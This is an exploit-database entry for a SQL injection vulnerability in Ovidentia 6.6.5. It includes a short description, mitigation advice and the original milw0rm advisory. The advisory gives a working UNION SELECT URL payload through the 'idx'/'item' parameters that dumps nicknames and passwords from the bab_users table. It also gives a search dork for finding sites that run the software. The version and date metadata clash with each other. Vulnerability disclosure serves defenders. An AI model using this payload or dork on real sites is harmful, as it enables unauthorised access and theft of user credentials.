Ovidentia 6.6.5 Sql Injection

vendor:

Ovidentia

by:

IRCRASH (R3d.W0rm (Sina Yazdanmehr))

7.5

CVSS

HIGH

SQL Injection

CWE

Product Name: Ovidentia

Affected Version From: 6.6.2005

Affected Version To: 6.6.2005

Patch Exists: NO

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2009

Ovidentia 6.6.5 Sql Injection

A SQL injection vulnerability exists in Ovidentia 6.6.5, which allows an attacker to execute arbitrary SQL commands via the 'idx' parameter in a 'index.php' script. An attacker can exploit this vulnerability to gain access to sensitive information such as usernames and passwords.

Mitigation:

Input validation should be used to prevent SQL injection attacks. Additionally, the application should use parameterized queries to prevent SQL injection.

Source

Exploit-DB raw data:

#####################################################################################
####                       Ovidentia 6.6.5 Sql Injection                         ####
#####################################################################################
#                                                                                   #
#AUTHOR : IRCRASH (R3d.W0rm (Sina Yazdanmehr))                                      #
#Discovered by : IRCRASH (R3d.W0rm (Sina Yazdanmehr))                               #
#Our Site : Http://IRCRASH.COM                                                      #
#IRCRASH Team Members : Dr.Crash - R3d.w0rm (Sina Yazdanmehr)                       #
#####################################################################################
#                                                                                   #
#Script Download : www.ovidentia.org                                                #
#                                                                                   #
#DORK : "Powered by Ovidentia"                                                      #
#                                                                                   #
#####################################################################################
#                                      [Bug]                                        #
#                                                                                   #
#http://Site/index.php?tg=contact&idx=modify&item=-99999'+union+select+0,1,2,concat(0x6E69636B6E616D65,0x3A,nickname),concat(0x70617373776F7264,0x3A,password),5,6,7,8,9,10,11,12,13,14+from+bab_users/*
#                                                                                   #
#                                     [Note]                                        #
#                                                                                   #
#You must login by a simple user and then use bug  ;)                                 #
#                                                                                   #
#####################################################################################
#                           Site : Http://IRCRASH.COM                               #
###################################### TNX GOD ######################################

# milw0rm.com [2008-08-11]